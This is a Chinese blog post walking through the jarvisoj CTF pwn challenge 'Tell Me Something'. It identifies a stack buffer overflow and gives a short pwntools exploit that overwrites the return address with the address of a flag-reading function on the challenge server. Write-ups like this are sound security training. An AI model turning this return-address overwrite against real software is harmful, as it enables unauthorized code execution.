1. 首页
  2. 文章中心
  3. oscp

jarvisoj——Tell Me Something

166 阅读 0 评论
我是靠谱客的博主 无聊小馒头,这篇文章主要介绍jarvisoj——Tell Me Something,现在分享给大家,希望可以做个参考。

本来想做其他的平台,但是搜了一下还是这个平台比较适合入门。

题目

在这里插入图片描述

Wp

这里首先下载,然后ida打开,看到main函数

在这里插入图片描述

main函数说的实际上就是有一个保存的栈大小为136,但是确允许输入256栈大小的内容,这里存在栈溢出的问题。

然后这里可以看到有一个good_gaem
在这里插入图片描述

可以看到是读取了一个flag.txt的文件。
在这里插入图片描述

那么需要做的就是先覆盖,这里我自己感觉的是,覆盖先将自身拉满,然后加返回地址直接覆盖就行。

最后就是先覆盖136的自身,然后加上good_game的地址即可。

pwntools

from pwn import *
sh = remote("pwn.jarvisoj.com",9876)  
data=136*'a'+p64(0x400620)
sh.sendline(data)
sh.interactive()
sh.close()

在这里插入图片描述

最后

以上就是无聊小馒头最近收集整理的关于jarvisoj——Tell Me Something的全部内容,更多相关jarvisoj——Tell内容请搜索靠谱客的其他文章。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(110)

相关文章

win10 uwp 使用 LayoutTransformer
win10 uwp 使用 LayoutTransformer
Pytorch 学习(7):Pytorch中的Non-linear Activations (非线性层)实现
Pytorch 学习(7):Pytorch中的Non-linear Activations (非线性层)实现
【学习笔记】Pytorch深度学习-网络层之池化层、线性层、激活函数层
【学习笔记】Pytorch深度学习-网络层之池化层、线性层、激活函数层
ACL 2022 主会长文论文分类整理
ACL 2022 主会长文论文分类整理
jarvisoj——Tell Me Something
jarvisoj——Tell Me Something
Jarvis oj tell me something writeup
Jarvis oj tell me something writeup
TELL ME MORE V10西班牙语评估
TELL ME MORE V10西班牙语评估
解决提交到github报错Please tell me who you are.和为不同的项目设置不同的名称
解决提交到github报错Please tell me who you are.和为不同的项目设置不同的名称

评论列表共有 0 条评论

立即
投稿
返回
顶部